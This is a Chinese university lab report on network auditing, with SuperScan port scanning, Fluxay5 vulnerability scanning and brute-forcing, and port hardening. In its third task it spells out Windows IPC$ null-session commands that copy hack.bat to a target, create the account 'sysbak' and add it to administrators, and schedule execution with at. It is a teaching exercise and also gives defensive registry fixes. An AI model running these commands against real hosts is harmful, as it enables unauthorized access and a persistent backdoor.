版權(quán)說明:本文檔由用戶提供并上傳,收益歸屬內(nèi)容提供方,若內(nèi)容存在侵權(quán),請進(jìn)行舉報(bào)或認(rèn)領(lǐng)
文檔簡介
試驗(yàn)三:網(wǎng)絡(luò)審計(jì)試驗(yàn)試驗(yàn)?zāi)康氖箤W(xué)生掌握網(wǎng)絡(luò)端口掃描器的使用措施,熟悉常見端口和其對應(yīng)的服務(wù)程序,掌握發(fā)現(xiàn)系統(tǒng)漏洞的措施。掌握綜合掃描及安全評估工具的使用措施,理解進(jìn)行簡樸系統(tǒng)漏洞入侵的措施,理解常見的網(wǎng)絡(luò)和系統(tǒng)漏洞以及其安全防護(hù)措施。試驗(yàn)環(huán)境(試驗(yàn)所使用的器件、儀器設(shè)備名稱及規(guī)格)Windows操作系統(tǒng)、SuperScan端口掃描工具、流光Fluxay5綜合掃描工具。試驗(yàn)任務(wù)及其規(guī)定任務(wù)一:使用Superscan端口掃描工具并分析成果。任務(wù)二:使用綜合掃描工具Fluxay5并分析成果。任務(wù)三:進(jìn)行簡樸的襲擊。試驗(yàn)過程及分析任務(wù)一:使用Superscan端口掃描工具并分析成果分組角色:學(xué)生A、學(xué)生B互相掃描對方主機(jī)。試驗(yàn)環(huán)節(jié):(1)在命令符提醒下輸入IPCONFIG查詢自己的IP地址(本機(jī)的IP地址為0對方的IP地址為)。(2)在Superscan中的HostnameLookup欄中,輸入同組學(xué)生主機(jī)的IP地址(),可通過單擊Lookup按鈕獲得主機(jī)名(如圖1所示)。圖1獲得對方主機(jī)顧客名設(shè)置IP欄、Scantype欄、Scan欄,使其對同組學(xué)生主機(jī)的所有端口以默認(rèn)的時(shí)間參數(shù)進(jìn)行掃描(如圖2所示)。圖2配置掃描參數(shù)根據(jù)掃描成果分析主機(jī)開放的端口類型和對應(yīng)的服務(wù)程序(如圖3所示)。圖3掃描成果通過“控制面板”的“管理工具”中的“服務(wù)”配置(如圖4所示),嘗試關(guān)閉或開放目標(biāo)主機(jī)上的部分服務(wù),重新掃描,觀測掃描成果的變化。圖4查看未修改時(shí)服務(wù)狀態(tài)常見端口的關(guān)閉措施:1、關(guān)閉79等端口:關(guān)閉SimpleTCP/IPService,支持如下TCP/IP服務(wù):CharacterGenerator,Daytime,Discard,Echo,以及QuoteoftheDay。關(guān)閉80端口:關(guān)掉WWW服務(wù)。在“服務(wù)”中顯示名稱為“WorldWideWebPublishingService”,通過Internet信息服務(wù)的管理單元提供Web連接和管理。3、關(guān)掉25端口:關(guān)閉SimpleMailTransportProtocol(SMTP)服務(wù),它提供的功能是跨網(wǎng)傳送電子郵件。4、關(guān)掉21端口:關(guān)閉FTPPublishingService,它提供的服務(wù)是通過Internet信息服務(wù)的管理單元提供FTP連接和管理。5、關(guān)掉23端口:關(guān)閉Telnet服務(wù),它容許遠(yuǎn)程顧客登錄到系統(tǒng)并且使用命令行運(yùn)行控制臺(tái)程序。6、關(guān)掉139端口,139端口是NetBIOS Session端口,用來文獻(xiàn)和打印共享,關(guān)閉139口聽措施是在“網(wǎng)絡(luò)和撥號連接”中“當(dāng)?shù)剡B接”中選用“Internet協(xié)議(TCP/IP)”屬性,進(jìn)入“高級TCP/IP設(shè)置”“WINS設(shè)置”里面有一項(xiàng)“禁用TCP/IP的NETBIOS”,打勾就關(guān)閉了139端口(如圖5所示)。圖5關(guān)掉139端口運(yùn)用TCP/IP篩選:網(wǎng)上鄰居屬性-當(dāng)?shù)剡B接屬性-常規(guī)-internet協(xié)議(TCP/IP)屬性-高級-選項(xiàng)-TCP/IP篩選-屬性-TCP端口-只容許139,445,這樣其他端口就都被關(guān)閉了(如圖6、7所示)。圖6只容許139,445通過圖7成果掃描圖任務(wù)二:使用綜合掃描工具Fluxay5并分析成果圖8各部份功能圖1:暴力破解的設(shè)置區(qū)域2:控制臺(tái)輸出3:掃描出來的經(jīng)典漏洞列表4:掃描或者暴力破解成功的顧客帳號5:掃描和暴力破解的速度控制6:掃描和暴力破解時(shí)的狀態(tài)顯示7:中斷按鈕8:探測記錄查找基本設(shè)置如下(如圖9所示):圖9基本設(shè)置圖選擇“文獻(xiàn)(F)”→“高級掃描向?qū)В╓)”可打開高級掃描向?qū)?,設(shè)置掃描參數(shù)。掃描結(jié)束后,流光會(huì)自動(dòng)打開HTML格式的掃描匯報(bào),并且還把可運(yùn)用的主機(jī)列在流光界面的最下方。單擊主機(jī)列表中的主機(jī)便可以直接對目的主機(jī)進(jìn)行連接操作(如圖10所示)對目的主機(jī)進(jìn)行連接操作示意圖除了使用“高級掃描向?qū)А迸渲酶呒墥呙柰猓€可以在探測菜單中直接選用高級掃描工具設(shè)置(如圖11所示):圖11探測菜單中直接選用高級掃描工具設(shè)置圖分組角色:學(xué)生A、學(xué)生B互相掃描對方主機(jī)。試驗(yàn)環(huán)節(jié):開放FTP服務(wù),容許匿名連接(此處掃描的主機(jī)IP地址為45)。(2)打開流光FLUXAY5工具,使用“高級掃描向?qū)А边M(jìn)行設(shè)置,使其能對同組學(xué)生主機(jī)的所有端口、服務(wù)、漏洞、所有顧客等進(jìn)行全面的掃描(如圖12所示)。圖12掃描成果(3)仔細(xì)觀測掃描成果,分析同組學(xué)生主機(jī)上存在的多種漏洞。(4)根據(jù)掃描成果分析FTP漏洞:如成果顯示有漏洞,則運(yùn)用“流光”提供的入侵菜單進(jìn)行FTP連接,嘗試上傳或下載文獻(xiàn)(如圖13、14所示)。圖13建立ftp連接圖14嘗試上傳文獻(xiàn)(5)根據(jù)掃描成果分析IPC$漏洞:IPC是為了讓進(jìn)程間通信而開放的命名管道,可以通過驗(yàn)證顧客名和密碼獲得對應(yīng)的權(quán)限,在遠(yuǎn)程管理計(jì)算機(jī)和查看計(jì)算機(jī)的共享資源時(shí)使用。運(yùn)用IPC$,連接者可以與目的主機(jī)建立一種空連接而無需顧客名和密碼,從而可以得到目的主機(jī)上的顧客列表,并也許破解顧客密碼。IPC$有關(guān)命令:建立和目的的ipc$連接命令:netuse\\目的IP\ipc$“密碼”/user:“ADMIN”(管理員賬號),如:netuse\\28\ipc$“”/user:"administrator";映射網(wǎng)絡(luò)驅(qū)動(dòng)器命令(將目的主機(jī)的盤映射到當(dāng)?shù)卮疟P):netuse當(dāng)?shù)乇P符\\目的IP\盤符$,如:netusez:\\28\c$;和目的建立了ipc$后,則可直接用IP加盤符加$訪問。例如:copy文獻(xiàn)名\\IP\盤符$\途徑\文獻(xiàn)名,如:copyhack.bat\\28\c$,也可直接對映射為當(dāng)?shù)卮疟P的網(wǎng)絡(luò)驅(qū)動(dòng)器操作。4.管理計(jì)算機(jī)上面的賬號命令:netuser查看賬號命令:netuser建立賬號命令:netusernamepasswd/add(netusersysbak123456/add:添加顧客名為sysback,密碼為123456的賬號)刪除賬號命令:netusername/delete管理工作組命令:netlocalgroup組名顧客名/add[delete] 如:netlocalgroupadministratorssysback/add。該命令表達(dá)把sysback顧客添加到管理員組(administrators)。6.查看目的計(jì)算機(jī)的系統(tǒng)時(shí)間:nettime\\ip7.在遠(yuǎn)程主機(jī)上建立計(jì)劃任務(wù):at\\IPTIMECOMMANDat\\2813:45c:\hack.bat(該命令表達(dá)在下午13點(diǎn)45分執(zhí)行目的主機(jī)C盤中的hack.bat文獻(xiàn),時(shí)間一定要晚于目前遠(yuǎn)程主機(jī)系統(tǒng)時(shí)間)刪除和目的的ipc$鏈接命令:netuse\\IP\ipc$/del斷開所有ipc$鏈接:netuse*/del嚴(yán)禁建立空連接:運(yùn)行regedit,找到主鍵 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA],把Restrict Anonymous(DWORD)的鍵值改為:00000001.嚴(yán)禁自動(dòng)打開默認(rèn)共享:找到主鍵[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters],把AutoShareServer(DWORD)的鍵值改為:00000000,假如不存在,就新建一種該鍵值。任務(wù)三:運(yùn)用破解的顧客ADMINISTRATOR對目的主機(jī)進(jìn)行留后門入侵,環(huán)節(jié):編寫批處理文獻(xiàn)hack.bat,文獻(xiàn)中包括兩個(gè)命令:1)建立一種賬號,2)將新賬號加入administrators組。使用net命令與目的主機(jī)進(jìn)行連接。將批處理文獻(xiàn)hack.bat拷貝到目的主機(jī)上。通過計(jì)劃任務(wù)使目的主機(jī)執(zhí)行hack.bat文獻(xiàn)。斷開所有ipc$連接。通過采用新賬號與目的主機(jī)建立連接來驗(yàn)證賬號與否成功建立。刪除和目的主機(jī)的連接。執(zhí)行安全防護(hù)措施:目的主機(jī)對注冊
溫馨提示
- 1. 本站所有資源如無特殊說明,都需要本地電腦安裝OFFICE2007和PDF閱讀器。圖紙軟件為CAD,CAXA,PROE,UG,SolidWorks等.壓縮文件請下載最新的WinRAR軟件解壓。
- 2. 本站的文檔不包含任何第三方提供的附件圖紙等,如果需要附件,請聯(lián)系上傳者。文件的所有權(quán)益歸上傳用戶所有。
- 3. 本站RAR壓縮包中若帶圖紙,網(wǎng)頁內(nèi)容里面會(huì)有圖紙預(yù)覽,若沒有圖紙預(yù)覽就沒有圖紙。
- 4. 未經(jīng)權(quán)益所有人同意不得將文件中的內(nèi)容挪作商業(yè)或盈利用途。
- 5. 人人文庫網(wǎng)僅提供信息存儲(chǔ)空間,僅對用戶上傳內(nèi)容的表現(xiàn)方式做保護(hù)處理,對用戶上傳分享的文檔內(nèi)容本身不做任何修改或編輯,并不能對任何下載內(nèi)容負(fù)責(zé)。
- 6. 下載文件中如有侵權(quán)或不適當(dāng)內(nèi)容,請與我們聯(lián)系,我們立即糾正。
- 7. 本站不保證下載資源的準(zhǔn)確性、安全性和完整性, 同時(shí)也不承擔(dān)用戶因使用這些下載資源對自己和他人造成任何形式的傷害或損失。
最新文檔
- 金融服務(wù)承攬合同三篇
- 物流成本控制與倉庫效率計(jì)劃
- 貸款利率協(xié)議三篇
- 紡織品供應(yīng)招標(biāo)合同三篇
- 基金小鎮(zhèn)相關(guān)行業(yè)投資規(guī)劃報(bào)告
- 涉外學(xué)生管理與適應(yīng)輔導(dǎo)計(jì)劃
- 新光源助航燈光設(shè)備相關(guān)項(xiàng)目投資計(jì)劃書范本
- 多媒體教學(xué)資源利用計(jì)劃
- 企業(yè)虛擬貨幣貸款合同三篇
- 預(yù)算執(zhí)行監(jiān)控方案計(jì)劃
- 學(xué)前兒童衛(wèi)生與保健-期末大作業(yè):案例分析-國開-參考資料
- 濱州電動(dòng)伸縮雨棚施工方案
- ISO45001管理體系培訓(xùn)課件
- 24年國開建筑工程估價(jià)實(shí)訓(xùn)報(bào)告
- 醫(yī)院消防系統(tǒng)維護(hù)保養(yǎng)服務(wù)投標(biāo)方案(圖文版)(技術(shù)方案)
- 花都區(qū)2023-2024年-2024年八年級上學(xué)期語文期末試卷
- 第七單元 課題1 燃料的燃燒(第一課時(shí))九年級化學(xué)上冊課件(人教版2024)
- 2025年健康素養(yǎng)知識競賽題庫(含答案)
- 學(xué)校食堂供貨商合同的退出機(jī)制
- 人教版八年級英語上冊第五單元教學(xué)設(shè)計(jì)(教案)
- 北師版2024春八下數(shù)學(xué)2.2不等式的基本性質(zhì)【上課課件】
評論
0/150
提交評論